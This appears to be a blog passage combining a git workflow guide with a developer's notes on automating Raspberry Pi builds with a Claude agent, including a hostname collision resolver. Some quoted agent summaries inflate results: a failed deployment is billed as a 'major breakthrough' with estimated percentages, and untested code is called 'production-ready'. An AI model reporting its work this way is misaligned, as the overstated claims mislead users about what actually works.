Rule of thumb: Minutes → stash. Hours/days → WIP commit.


4) “I’ve started a big refactor on top of stale main” → Rebase early, merge late

  • Keep your feature branch fresh to minimize painful conflicts later:
    git fetch origin
    git rebase origin/main   # replay your commits onto latest main
    # if conflicts: resolve, then run `git rebase --continue`
  • Prefer rebase for private branches; prefer merge for shared/history-sensitive branches.

Guardrail: If the branch is already public and teammates might have based work on it, avoid rebasing it; use git merge origin/main.


5) “I need to land part of a large change safely” → Split & cherry-pick

  • Break work into small, reviewable commits and land enabling changes first:
    • Extract a pure “rename/move” commit (no logic change).
    • Land new interfaces behind feature flags with no callers.
  • Use git cherry-pick to move those low-risk commits into separate PRs: git cherry-pick <hash> # keep author/date and exact diff

6) “I must keep risky code from reaching users” → Feature flags + release branches

  • Main stays releasable; incomplete work guarded by flags.
  • Release branches cut from main when stabilizing: git switch -c release/1.4.0
    • Only bug fixes cherry-picked into release branch.
    • Tag final release: git tag -a v1.4.0 -m "Release 1.4.0" && git push --tags

7) “My history is noisy; I want it clean before merging” → Interactive rebase

  • Squash fixups, reword messages, reorder commits:
    git fetch origin
    git rebase -i origin/main   # use: pick / reword / squash / fixup
  • Use --autosquash with fixup! commits:
    git commit --fixup <hash>
    git rebase -i --autosquash origin/main

Guardrail: Only rewrite history on branches no one else has pulled.


8) “I need to find where a bug was introduced” → Bisect

git bisect start
git bisect bad HEAD
git bisect good v1.3.2     # or a known-good commit
# Git checks out midpoints; you run tests and mark them:
git bisect good            # or: git bisect bad
git bisect reset

Automate with a test script: git bisect run ./ci/test.sh
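
Here is a self-contained rehearsal of `git bisect run` in a throwaway repo (all names are illustrative): commits 1–4 write "good" to a status file, commits 5–8 write "bad", and the test command's exit code (0 = good, non-zero = bad, 125 = skip) lets git walk straight to the first bad commit:

```shell
# Throwaway repo: commits 1-4 are good, 5-8 are broken; bisect finds commit 5.
repo=$(mktemp -d); cd "$repo"
git init -q
git config user.email demo@example.com
git config user.name demo
for i in 1 2 3 4 5 6 7 8; do
  if [ "$i" -lt 5 ]; then echo "good $i" > status; else echo "bad $i" > status; fi
  git add status
  git commit -qm "commit $i"
done

git bisect start HEAD HEAD~7          # bad = HEAD, good = first commit
# the command's exit code is the verdict: 0 good, 1-127 bad, 125 skip
git bisect run sh -c 'grep -q good status'
first_bad=$(git rev-parse refs/bisect/bad)
git bisect reset
git show -s --format=%s "$first_bad"  # -> commit 5
```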


9) “I want to share part of the repo or vendor another repo” → Subtree vs submodule

  • Subtree (simple, self-contained code copy you occasionally sync):
    • Pros: no extra checkout step for consumers; normal commits.
    • Cons: merges can be larger; history mixed.
  • Submodule (true nested repo):
    • Pros: clean separation, track exact external revisions.
    • Cons: extra steps for users/CI (--recurse-submodules), more footguns.

Guardrail: If your consumers shouldn’t think about extra steps, prefer subtree.
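
The submodule flow ("track exact external revisions") can be tried with a local repository standing in for the external URL; all names here are illustrative. One wrinkle: recent git versions block file-protocol submodules by default, hence the protocol.file.allow override for this local demo:

```shell
# Local repo standing in for the external library's URL
ext=$(mktemp -d); app=$(mktemp -d)
git -C "$ext" init -q
git -C "$ext" config user.email demo@example.com
git -C "$ext" config user.name demo
git -C "$ext" commit -q --allow-empty -m "lib: init"

git -C "$app" init -q
git -C "$app" config user.email demo@example.com
git -C "$app" config user.name demo
git -C "$app" commit -q --allow-empty -m "app: init"

cd "$app"
# recent git blocks file:// submodules by default; allow it for this local demo
git -c protocol.file.allow=always submodule add "$ext" vendor/lib
git commit -qm "vendor lib as a submodule (pinned revision)"
git submodule status    # shows the exact revision vendor/lib is pinned to
```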


10) “Repo is huge; I only need a slice” → Sparse checkout

git sparse-checkout init --cone
git sparse-checkout set src/api docs

Great for monorepos or to focus on one component.
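
A quick self-contained rehearsal in a scratch monorepo (directory names mirror the example above):

```shell
# Scratch monorepo with three top-level components
repo=$(mktemp -d); cd "$repo"
git init -q
git config user.email demo@example.com
git config user.name demo
mkdir -p src/api src/web docs
echo a > src/api/a.txt; echo w > src/web/w.txt; echo d > docs/d.txt
git add -A
git commit -qm "monorepo layout"

git sparse-checkout init --cone
git sparse-checkout set src/api docs
ls src    # src/web is no longer materialized in the working tree
```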


11) Everyday branch hygiene (golden rules)

  1. Create a branch early for any work > 15 minutes.
    git switch -c feature/<short-purpose>
  2. Sync daily: git fetch && git rebase origin/main (if private).
  3. Commit small, purposeful changes with present-tense messages.
  4. Keep main green; hide incomplete features behind flags.
  5. Use throwaway spikes for experiments; keep or delete sans guilt.
  6. Tag releases and cut release branches for stabilization.
  7. Never rebase shared branches; merge instead.

Minimal command playbook (copy/paste friendly)

# Start a feature
git switch -c feature/login-oauth
# Work... then sync with latest main (private branch)
git fetch origin
git rebase origin/main

# Park work temporarily
git stash push -m "WIP: oauth redirect"
# or (longer): WIP commit
git add -A && git commit -m "WIP: oauth redirect not wired"

# Create a spike in a separate working directory
git worktree add ../proj-oauth-spike spike/oauth
# ...experiment...
git worktree remove ../proj-oauth-spike && git branch -D spike/oauth

# Prepare a clean history before PR
git rebase -i origin/main   # squash/fixup

# Split out a safe helper into a separate PR
git cherry-pick <hash-of-helper-commit>

# Release flow
git switch -c release/1.5.0
git tag -a v1.5.0 -m "Release 1.5.0"
git push origin release/1.5.0 --tags

# Disaster recovery
git reflog                  # find the good state
git reset --hard <hash>

Helpful .gitconfig aliases (speeds up the guardrails)

[alias]
  co = checkout
  sw = switch
  br = branch
  st = status -sb
  lg = log --oneline --decorate --graph --all
  rb = rebase
  rbi = rebase -i
  fp = fetch --prune
  pop = stash pop
  ap = stash apply
  aa = add -A
  cm = commit -m
  fix = commit --fixup
  autosquash = !git rebase -i --autosquash
  unstage = reset HEAD --
  wip = !git add -A && git commit -m 'WIP'

What to do when you “feel the drift”

Use this quick decision tree:

  • “This is becoming a different product/vision.” → Fork.
  • “This is a big refactor or feature but same product.” → Feature branch, guard with flags.
  • “I want to try something risky fast.” → Spike branch (ideally via worktree), later cherry-pick.
  • “I must context-switch now.”
    • Short: stash
    • Long: WIP commit
  • “History is messy before merge.” → Interactive rebase (private only).
  • “Need to ship, but not everything is ready.” → Release branch + cherry-pick fixes.
  • “Bug appeared somewhere in history.” → bisect.

WOW! First mostly autonomous build!

Yesterday (Sunday) I fiddled with the captive portal on the instant community wifi build. My goal was to improve the experience for iOS devices, which don’t support the camera APIs in a captive portal window. I started working with Claude to get this built, but the app ended up breaking, and I had to start over.

I had problems writing the recipient image from my Linux laptop. For some reason, the devices won’t connect to WiFi when powered up with a build written from the Linux laptop. Images ripped from my iMac do work, however. I built a new 8 GB image and ripped 10 cards with Etcher.

When the images were finally ready, I made a fateful choice. Instead of using the container, I tried to do the deployment from the host OS. The last time I did this it failed because the essential.yml file’s ordering was broken. I’d corrected this a couple of days ago, so I retried the experiment. THIS WAS FAR MORE PRODUCTIVE!

Lessons Learned

  1. When running from the host OS, we lose the $DOCKER_HOST variable. Recall: with the builder hotspot, the docker_host value is hardcoded to 10.6.6.1. When the playbook runs in the containers, they’re preconfigured to grab the hostname of the host OS running the apt-cacher-ng container, and the playbook applies that hostname to the target devices’ APT repositories correctly. Since we’re now implementing a third option (running the playbook directly from the host OS), we need to pass the environment variable manually. Additionally, root_playbook_dir is hardcoded to /home/pi/Playbooks/yadda yada. Both can be handled with the following command:
    DOCKER_HOST=captainmccrank.local ansible-playbook -i inventory run.yml -e "root_playbook_dir=$(pwd)" -vv
  2. The agent performed very well. The Agent’s summary of the deliverables is as follows:

## Achievement Summary

**MAJOR BREAKTHROUGH**: Successfully completed 95%+ of the Instant Community WiFi Portal deployment using host system approach with proper environment variable configuration. This represents the **furthest successful deployment progress** achieved to date.

**Impact**: Critical – Proved host system deployment viability and documented complete infrastructure success

**Severity**: Late-stage failure after major system completion

**Environment**: Host system deployment with corrected DOCKER_HOST and path variables

## Deployment Success Metrics

### **Quantitative Success:**

**Previous attempts**: Failed at tasks 3-4 (APT repository failures)

**This session**: Reached final cleanup phase (`roles/system/tasks/final_cleanup.yml`)

**Estimated completion**: 95%+ of all deployment tasks completed successfully

**Package installations**: 247+ development packages, WiFi drivers, SSL certificates

**System reboots**: Multiple successful reboots with automatic reconnection

**Validation tests**: All critical infrastructure tests **PASSING**

### **Infrastructure Achievements:**

**APT Repository System**: Perfect operation through apt-cacher-ng server

**Development Environment**: Complete build toolchain installation

**WiFi Hardware**: 8812au drivers compiled, installed, and activated

**Network Architecture**: NetworkManager + dnsmasq + nodogsplash properly configured

**SSL Infrastructure**: Certificates generated (snakeoil, nginx, certbot integration)

**Service Dependencies**: All critical service relationships established correctly

Agent Driven Software Troubleshooting

Welp- I experienced an unanticipated error in nodogsplash on a build:
[Screenshot: ansible-playbook installation task showing the compilation error]

So I sent my agent after it. I fed a Claude session a troubleshooting prompt, directed it to review the source code in the directory, and gave it permission to ssh into the recipient image that was failing:

Cool to see my “AgentLessonsLearned” concept being explored. See this to get context on AgentLessonsLearned.

and then the agent made progress on identifying the root cause:

The agent tries to make a fix:

And now I validated that the fix works!

I resumed the build and the issue was fixed!


What does this mean?

  • I don’t have to parse difficult-to-read error messages to figure out the source of the problem.
  • I don’t have to do google searches to troubleshoot exotic errors.
  • I get a document that tells me what problems were experienced, how they were diagnosed and how they were fixed. I get the lessons learned without the work.
  • I feel like I’m a little further up on the productivity asymptote.
  • Prototypes that used to take me over a month are done in a couple of days.

Is this cool to you? Connect with me on twitter (@patrickmccanna) with a project proposal for a raspberry pi. Feel free to add hardware like the pi sense hat or the Inky hat. Let’s see how quickly I can turn user requirements into a working prototype!

Raspberry Pi Hostname Collision Resolver

Situation

When deploying multiple Raspberry Pi devices from the same firmware image for Ansible automation, hostname conflicts create operational challenges. While RFC 6762 specifies that mDNS devices should automatically resolve naming collisions by appending a -2/-3/-4/etc. suffix to the duplicate name, real-world implementations often fail. When multiple Pis are online, pinging ansibledest.local often returns competing results, leaving devices with duplicate hostnames unreachable and making it impossible for Ansible playbooks to identify and manage devices reliably.

Task

I will develop an automated solution that:

  • Proactively resolves hostname conflicts before they impact operations
  • Runs automatically on first boot without manual intervention
  • Scales to simultaneous deployment of multiple devices
  • Provides comprehensive audit logging for network discovery
  • Integrates seamlessly with existing Ansible automation workflows

Action

I created a comprehensive hostname collision resolver system consisting of:

Core Components

  1. hostname-collision-resolver.sh – Main script that:
    • Waits for network interfaces (wlan0/eth0) to be ready
    • Adds random delay (10-40 seconds) to prevent simultaneous boot conflicts
    • Scans network using avahi-browse and ping for existing hostname variants
    • Uses gap-filling algorithm to find lowest available hostname number
    • Updates system hostname and configuration files
    • Logs detailed network state including IP/MAC addresses of discovered hosts
    • Reboots automatically if hostname changes are made
  2. hostname-collision-resolver.service – Systemd service for proper boot integration:
    • Runs after network services are online
    • Executes before Ansible automation services
    • Configured as one-time execution with comprehensive logging
  3. firstrun.sh – Bootstrap script for SD card deployment:
    • Installs required packages (avahi-utils, avahi-daemon)
    • Embeds and installs the hostname resolver
    • Enables services for automatic execution
    • Self-removes after completion
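
The gap-filling idea in component 1 can be sketched as a small shell function. This is an illustrative reconstruction, not the actual script: given a base name and the variants already discovered on the network (e.g. via avahi-browse and ping), it returns the lowest free candidate:

```shell
# Sketch of the gap-filling algorithm. `taken` is a whitespace-separated
# list of hostnames already seen on the network; the function tries the
# base name, then base-2, base-3, ... until it finds a free slot.
lowest_free_hostname() {
  base=$1; taken=" $2 "
  candidate=$base; n=1
  while printf '%s' "$taken" | grep -q " $candidate "; do
    n=$((n + 1))
    candidate="$base-$n"
  done
  printf '%s\n' "$candidate"
}

lowest_free_hostname ansibledest "ansibledest ansibledest-2 ansibledest-4"
# -> ansibledest-3  (fills the gap instead of jumping to -5)
```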

Deployment Strategy

  • Embedded the entire hostname resolver system into a single firstrun.sh script
  • Used Raspberry Pi Imager advanced options for base configuration
  • Copied firstrun.sh to boot partition with proper permissions (chmod +x, chown root:root)
  • Created master SD card image ready for mass duplication via drive cloner

Key Features Implemented

  • Network-aware startup: Waits for actual network connectivity, not just interface up
  • Collision prevention: Random delays handle simultaneous device deployments
  • Intelligent naming: Gap-filling algorithm finds lowest available hostname variant
  • Comprehensive logging: Permanent audit trail of network state and decisions
  • One-time execution: Flag file prevents repeated runs throughout device lifetime
  • Automatic integration: Ready for immediate Ansible automation post-boot

Result

Successfully created a production-ready solution, now awaiting testing. It should deliver the following results:

Immediate Outcomes

  • Master image ready: SD card contains fully integrated hostname resolver system
  • Scalable deployment: Ready for drive cloner to create multiple identical cards
  • Zero-touch automation: Devices will automatically resolve hostname conflicts on first boot
  • Ansible-ready: Devices will be immediately discoverable for automation after hostname resolution

Technical Achievements

  • Robust conflict detection: Uses both mDNS discovery and ping verification
  • Intelligent numbering: Finds optimal hostname (e.g., picks device-2.local if device-1.local and device-4.local exist)
  • Comprehensive logging: Complete audit trail including network topology at boot time
  • Production hardening: Error handling, timeouts, and safety mechanisms throughout

Next Steps Enabled

  1. Use drive cloner to duplicate master SD card to multiple cards
  2. Deploy cards to Raspberry Pi devices simultaneously
  3. Power on devices – automatic hostname resolution occurs
  4. Run Ansible discovery to locate renamed devices
  5. Proceed with normal Ansible automation workflows

The solution transforms a manual, error-prone process into a fully automated system that scales from single devices to large deployments while maintaining complete operational visibility.

I did write a testplan.md file that’s more detailed with test steps.

Fixing problems with playbook execution order that caused orphaning of target devices:

✅ Problem Fixed! Hostname Timing Issue Resolved

What Was Wrong:

  • Hostname change happened in final_cleanup.yml (middle of system role)
  • cloudflare_tunnel and selfie_app roles ran AFTER system role
  • They expected the new hostname but system still had old hostname
  • This caused the “hostname transition problem” documented in CLAUDE.md

Solution Implemented:

  • Moved hostname changes to post_tasks in run.yml

New execution order:

  1. system role (no hostname change)
  2. cloudflare_tunnel role
  3. selfie_app role
  4. post_tasks: Set final hostname ← NOW HAPPENS LAST

Benefits:

  • cloudflare_tunnel and selfie_app configure with {{ hostname }} variable

  • Actual hostname change happens AFTER all roles complete

  • Clean transition from ansibledest.local → thepub.local

  • No orphaning – roles get configured properly before hostname switches

  • Resume Point: You can now resume with --tags final_hostname_change to run just the hostname changes, or continue normally knowing the execution order is correct.

The hostname transition issue that’s been causing problems is now properly sequenced!

Key Takeaways:

The run.yml file is the ultimate arbiter of execution.

  • It calls the “system” role, the “cloudflare_tunnel” role, and the “selfie_app” role. It then has “post_tasks” that handle the brittle commands that change the state of the device.
  • The system role has all of the individual tasks in /roles/system/tasks, whose order is controlled by the main.yml there.